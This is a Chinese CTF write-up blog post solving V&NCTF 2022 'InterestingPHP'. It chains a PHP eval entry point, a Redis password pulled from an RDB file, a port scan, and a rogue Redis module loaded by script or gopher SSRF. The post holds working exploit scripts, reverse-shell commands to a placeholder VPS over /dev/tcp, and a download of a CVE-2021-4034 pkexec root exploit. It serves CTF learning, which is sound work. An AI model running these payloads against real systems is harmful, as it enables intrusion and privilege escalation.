[V&NCTF 2022]InterestingPHP

最新推荐文章于 2024-06-17 10:49:46 发布
最新推荐文章于 2024-06-17 10:49:46 发布
阅读量1k 收藏
点赞数 1
分类专栏: ctf 文章标签: php 开发语言 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/122999945
版权

1NDEX

0x00 前言

比赛时候外出 回来复现了
只有4个人出 看来是挺难
贴一下源码
就知道没那么简单

<?php highlight_file(__FILE__); @eval($_GET['exp']);?>

0x01 brain.md

一开始试了几个发现都被ban了
连phpinfo都用不了…
扩展新函数

ini_get_all

  • (PHP 4 >= 4.2.0, PHP 5, PHP 7, PHP 8)

    ini_get_all — 获取所有配置选项

    说明 ¶ ini_get_all(string $extension = ?, bool $details = true): array
    获取所有已注册的配置选项

get_cfg_var

  • (PHP 4, PHP 5, PHP 7, PHP 8)

    get_cfg_var — 获取 PHP 配置选项的值

    说明 get_cfg_var(string $option): mixed 获取 PHP 配置选项 option 的值。

    此函数不会返回 PHP 编译的配置信息,或从 Apache 配置文件读取。

    检查系统是否使用了一个配置文件,并尝试获取 cfg_file_path 的配置设置的值。 如果有效,将会使用一个配置文件。

dump出来 or var_dump(get_cfg_var(xxx))
太长就不贴了 我们需要注意的部分有disable_function、disable_class、open_basedir
在这里插入图片描述
disable_function

[“disable_functions”]=> array(3) { [“global_value”]=> string(816) “include,include_once,require,require_once,stream_get_contents,fwrite,readfile,file_get_contents,fread,fgets,fgetss,file,parse_ini_file,show_source,fsockopen,proc_open,ini_set,pfsockopen,ini_alter,ini_get,posix_kill,phpinfo,putenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,iconv,system,exec,shell_exec,popen,passthru,symlink,link,syslog,imap_open,dl,mail,stream_socket_client,error_log,debug_backtrace,debug_print_backtrace,gc_collect_cycles,array_merge_recursive,get_cfg_var” [“local_value”]=> string(816) “include,include_once,require,require_once,stream_get_contents,fwrite,readfile,file_get_contents,fread,fgets,fgetss,file,parse_ini_file,show_source,fsockopen,proc_open,ini_set,pfsockopen,ini_alter,ini_get,posix_kill,phpinfo,putenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,iconv,system,exec,shell_exec,popen,passthru,symlink,link,syslog,imap_open,dl,mail,stream_socket_client,error_log,debug_backtrace,debug_print_backtrace,gc_collect_cycles,array_merge_recursive,get_cfg_var” [“access”]=> int(4) }

可以看到大多数都被ban了 好消息是file_put_contents还在
这也解释了为什么蚁剑虽然能连接上写的webshell,但虚拟终端无法执行命令
并且不能直接用蚁剑写文件(判断蚁剑用shell操作的函数都被ban了
但连接后凑巧看到了当前目录(exp和1都是后来自己写的)
在这里插入图片描述
想到rdb应该是突破口了
down下来 redis数据备份文件
猜测ye_w4nt_a_gir1fri3nd其为密码

REDIS0008� redis-ver4.0.9�
redis-bits�@�ctime³��a�used-mem€� � aof-preamble� � � sercetye_w4nt_a_gir1fri3nd��nR�K��S

redis rdb文件格式详解

然后就需要探测redis服务端口了
学习赵总WMCTF的wp
WMCTF2021-Web-Make PHP Great Again And Again WriteUp

探测服务端开放端口
http://270bf8f2-a616-4282-9e0e-f86ec36a110b.node4.buuoj.cn:81/?exp=eval($_POST[a]);

for($i=0;$i<65535;$i++) {
  $t=stream_socket_server("tcp://0.0.0.0:".$i,$ee,$ee2);
  if($ee2 === "Address already in use") {
    var_dump($i);
  }
}

在这里插入图片描述
或者

/?exp=eval(file_put_contents("1.php",base64_decode($_POST['a'])));
POST:
a=PD9waHAKaGlnaGxpZ2h0X2ZpbGUoX19GSUxFX18pOwojIFBvcnQgc2Nhbgpmb3IoJGk9MDskaTw2NTUzNTskaS
srKSB7CiAgJHQ9c3RyZWFtX3NvY2tldF9zZXJ2ZXIoInRjcDovLzAuMC4wLjA6Ii4kaSwkZWUsJGVlMik7CiAgaW
YoJGVlMiA9PT0gIkFkZHJlc3MgYWxyZWFkeSBpbiB1c2UiKSB7CiAgICB2YXJfZHVtcCgkaSk7CiAgfQp9Cg==

注:使用接口调试插件或base64编码进行传输,避免换行符等在参数传输时出错!!

stream_socket_server

(PHP 5, PHP 7, PHP 8)

stream_socket_server — Create an Internet or Unix domain server socket

说明 ¶

stream_socket_server(
    string $address,
    int &$error_code = null,
    string &$error_message = null,
    int $flags = STREAM_SERVER_BIND | STREAM_SERVER_LISTEN,
    ?resource $context = null
): resource|false

Creates a stream or datagram socket on the specified address.

This function only creates a socket, to begin accepting connections use stream_socket_accept().
EG:

<?php
$socket = stream_socket_server("tcp://0.0.0.0:8000", $errno, $errstr);
if (!$socket) {
  echo "$errstr ($errno)<br />\n";
} else {
  while ($conn = stream_socket_accept($socket)) {
    fwrite($conn, 'The local time is ' . date('n/j/Y g:i a') . "\n");
    fclose($conn);
  }
  fclose($socket);
}
?>

从而知晓redis端口8888

get_loaded_extensions()

返回所有编译并加载模块名的 array
var_dump出来看到有redis(redis.so)

redis module load rce

https://xz.aliyun.com/t/5665#toc-16

先用file_put_contents写入恶意so文件

https://github.com/n0b0dyCN/redis-rogue-server

远程down文件尽量使用py

import requests

url = "http://270bf8f2-a616-4282-9e0e-f86ec36a110b.node4.buuoj.cn/?exp=eval($_POST[0]);"
headers = {"content-type": "application/x-www-form-urlencoded"}
pay = "http://xxx(vps)/exp.so"
payload = '''
      function Curl($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
            $result = curl_exec($ch);

            curl_close($ch);
            file_put_contents("exp.so",$result);
      }

      Curl("''' + pay + '''");
'''.strip()

data = {
    0: payload
}
r = requests.post(url, data, headers=headers).text
print(r)

CURLOPT_RETURNTRANSFER 将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。

然后两种姿势module load 反弹shell

官方wp直接通过redis类执行命令

Redis类中有 rawCommand() ⽅法可以执⾏redis的命令操作

$redis = new Redis();
$redis->connect('127.0.0.1',8888);
$redis->auth('ye_w4nt_a_gir1fri3nd');
$redis->rawCommand('module','load','/var/www/html/exp.so');
$redis->rawCommand("system.exec","bash -c 'exec bash -i &>/dev/tcp/VPS_IP/PORT <&1'");

在这里插入图片描述

利用gopher ssrf
import requests
from urllib import parse


url = "http://270bf8f2-a616-4282-9e0e-f86ec36a110b.node4.buuoj.cn/?exp=eval($_POST[0]);"
headers = {"content-type":"application/x-www-form-urlencoded"}

pay="""auth ye_w4nt_a_gir1fri3nd
module load ./exp.so
system.exec 'bash -c "bash -i >& /dev/tcp/vps_ip/7777 0>&1"'
quit
""".replace('\n','\r\n')

payload = '''
      function Curl($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
            $result = curl_exec($ch);
            curl_close($ch);
            if($result!=''){
            echo $result;
            }
            
        } 
        Curl("gopher://127.0.0.1:8888/_'''+parse.quote(pay)+'''");
        '''

data = {
    0:payload
}

r = requests.post(url,data=data,headers=headers).text
print(r)

拿到shell后发现无权限
在这里插入图片描述
suid提权 --> pkexec提权

https://github.com/arthepsy/CVE-2021-4034.git

www-data@out:~/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
www-data@out:~/html$
www-data@out:~/html$ wget
wget
bash: wget: command not found
www-data@out:~/html$ curl xxx:888/cve-2021-4034-poc -o ./poc
curl xxx:888/cve-2021-4034-poc -o ./poc
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16296  100 16296    0     0   274k      0 --:--:-- --:--:-- --:--:--  279k
www-data@out:~/html$ ls
ls
exp.so
index.php
poc
secret.rdb
www-data@out:~/html$ ./poc
./poc
bash: ./poc: Permission denied
www-data@out:~/html$ chmod +x ./poc
chmod +x ./poc
www-data@out:~/html$ ./poc
./poc
whoami
root
cat /flag
flag{5c08372f-6b1c-4c31-97ff-2d5721369f49}

参考文章

https://blog.csdn.net/jvkyvly/article/details/122913401

k_du1t
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
H&NCTF 2024 Re 全解WP(带附件加详细解析)
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
解决连接本地的问题
rev1ve的博客
12-06 374
记录一次在本地用docker复现题目时,出现连接不上问题。
连接虚拟终端执行命令返回结果为ret=-1
bgsnnzy的博客
10-31 947
检查网络连接:确保你的本地网络连接正常工作,可以尝试通过其他方式连接到目标主机,例如使用命令行工具进行连接。检查远程主机服务状态:确认目标主机必要的服务(如 SSH 或 Telnet)是否已启动并正在运行。检查目标主机的防火墙设置:如果目标主机上运行了防火墙软件,确保正确配置允许连接请求通过。确保远程主机的连接信息正确:检查目标主机的IP地址、端口号、用户名和密码是否正确输入或配置。检查版本和插件:确保你使用的是最新版本的,并根据需要安装必要的插件。
中国 配置使用
Z_l123的博客
01-13 5808
1.编写一句话木马,并命名为muma.php 2.利用靶机的文件上传漏洞,将此木马文件( Webshell )上传至靶机 1)打开dvwa网站 2)成功登录DVWA网站后,在网站主页左侧菜单选择 DVWA Security,将网站的安全级别设置为"Low": 3)在 DVWA网站主页左侧菜单选择"File upload"进入文件上传训练关卡,将muma.php上传至靶机,并记下文件上传的路径: 3.利用"中国"连接靶机上的 muma.php 1)打开中国 2)在
代码执行漏洞 + antsword()调试应用
weixin_47306547的博客
09-12 2892
代码执行漏洞概述 概念:代码执行漏洞是指应用程序本身过滤不严,攻击者可以通过请求将代码注入到应用中,最终在web服务器上去执行。类似我们常见的SQL注入,是将SQL语句带入数据库查询,而我们的代码注入,则是将代码注入到脚本中让应用对代码进行解析,其危害直接相当于一个WEB后门的存在!远程代码执行实际上就是调用服务器网站代码进行执行。 代码执行漏洞成因 由于服务端存在执行的函数,在使用的过程中没有做好一个严格的控制,造成了实际的参数在客户端中可控 代码执行漏洞的危害 执行任意代码 向网站写WebS
红日(vulnstack)3 内网渗透ATT&CK实战
m0_66299232的博客
03-11 1643
成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 1106 run 使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破
【红日内网打靶记录】红日3打靶(下)
weixin_54603520的博客
05-19 380
注意:连接后无法执行命令时因为系统设置了函数黑名单,这里使用的时bypass插件去继续进行,我们也可以考虑使用哥斯拉或者,因为这两个工具的传输是加密的,应该是可以直接执行命令的。这里发现查询到的ip并不是我们拿下的机器的IP,应该是什么软件流量代理造成的。所以我们这里查询出来的结果是其他端口。这里成功执行,并且帮我们创建了一个新的账号,我们可以直接设置密码,重新登录达到提权的目的。查询当前拿下的机器网络连接情况,这里发现了一个与其建立连接的机器,应该是通过93.100的机器去做代理的。
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
常见报错
m0_62905261的博客
07-27 2927
常见报错
NCTF2022 calc题目复现
m0_62422842的博客
12-10 1121
这都是在基于system函数执行的条件下(无论是php还是python),底层调用sh二进制文件,我们都可以注入环境变量来rce。换句话说,如果底层调用了sh -c命令的函数执行的话,具有环境变量注入条件,使用这个方法来getshell应该是可以的。这个赛题个人感觉质量很高,能够从中学习到很多知识。
一直报错怎么办(适合从未链接成功的人观看)
m0_63745032的博客
10-04 956
各种报错除了其他人说的,还有一个被他们忽略掉的问题,那就是win系统下安全中心,在每次把加载器解压出来的时候,win安全中心都会进行拦截并自动隔离,这个时候你需要点开,允许执行此操作,反复删除解压几次,一定要记得每次都允许执行,然后再次打开应该就没什么问题了。3.然后打开AntSword-Loader-v4.0.3-win32-x64里面的exe文件,这个时候会提示你让你选个文件夹初始化,选择文件夹到antSword-master这个文件夹下即可。作为刚开始接触的新人,一直各种报错怎么办?
操作手册
weixin_44820552的博客
03-27 2706
(AntSword)是一款开源的跨平台WebShell管理工具,将一句话木马上传到被测平台,通过进行连接获取被测平台的服务器webshell。
php解密 eval( base64_decode,PHP之eval(gzinflate(base64_decode加密解密
weixin_39942992的博客
03-10 1960
从网上下载了个php版本的小游戏站的源码,一直都没有时间看,今天闲着没事看了下各个文件夹的内容,有一个文件引起了小胡的注意,文件名为php.php,打开之后发现了是加密过后的php文件,于是试着找了下相关的解密。按照eval(gzinflate(base64_decode的解密方法,发现这是一个PHP的木马shell哦,还有解密之后看到了登陆的密码。于是打开phpstudy,进入这个php的木马,...
文件上传漏洞——upload-labs 1-19 (详解)
m0_62879498的博客
02-19 6755
upload-labs-1 删除 js 进行绕过 上传图片,发现上传成功 上传 shell 发现: 发现是白名单,所以由前面我们知道,极有可能在前端存在过滤,我们检查一下: 发现 checkFile() 起到了检查过滤的效果,我们将其删去并提交 发现: 然后用中国以 进行链接 发现成功 发现成功 同时我们发现仅仅在前端进行过滤是远远不够的,我们可以轻易的删去,所以除了前端,后端也必须进行校验 如果我们在使用发现了返回值为空说明一句话木马语法错误,如果我们发现返回值是一串乱码 则是链接地址
深入解析PHP函数
最新发布
NatLindsay的博客
06-17 492
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值